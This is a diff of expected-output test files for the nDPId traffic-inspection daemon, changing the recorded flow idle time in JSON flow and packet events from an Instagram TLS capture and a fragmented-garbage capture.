-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1568796265147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265147,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDRAbs6ii8aAAAAALAC\/\/8mxAAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2218,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1568796265158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265158,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNDH6s7\/29CFtqASbHAaPQAAAgQFeAQCCApocroGDXCenAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-data-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":12,"total-detected-flows":29,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":242,"global_ts_msec":1568796268061} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3443/3442 diff --git a/test/results/ip_fragmented_garbage.pcap.out b/test/results/ip_fragmented_garbage.pcap.out index 247697b91..bee01a656 100644 --- a/test/results/ip_fragmented_garbage.pcap.out +++ b/test/results/ip_fragmented_garbage.pcap.out @@ -1,7 +1,7 @@ 00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1534244024697} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244024697,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4mKigpKComXiUkI0AjJCUpOAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244024697,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4mKigpKComXiUkI0AjJCUpOAAA"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244024697} 00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAl4mKigqJl4lJCMmKihLSUo="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244024697} @@ -626,8 +626,8 @@ 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":312,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkQyKiZERkdISksmXiUkIyM="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":313,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244024701} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkVUUiVZXlUm"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244025001,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkwp4QAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244025001,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 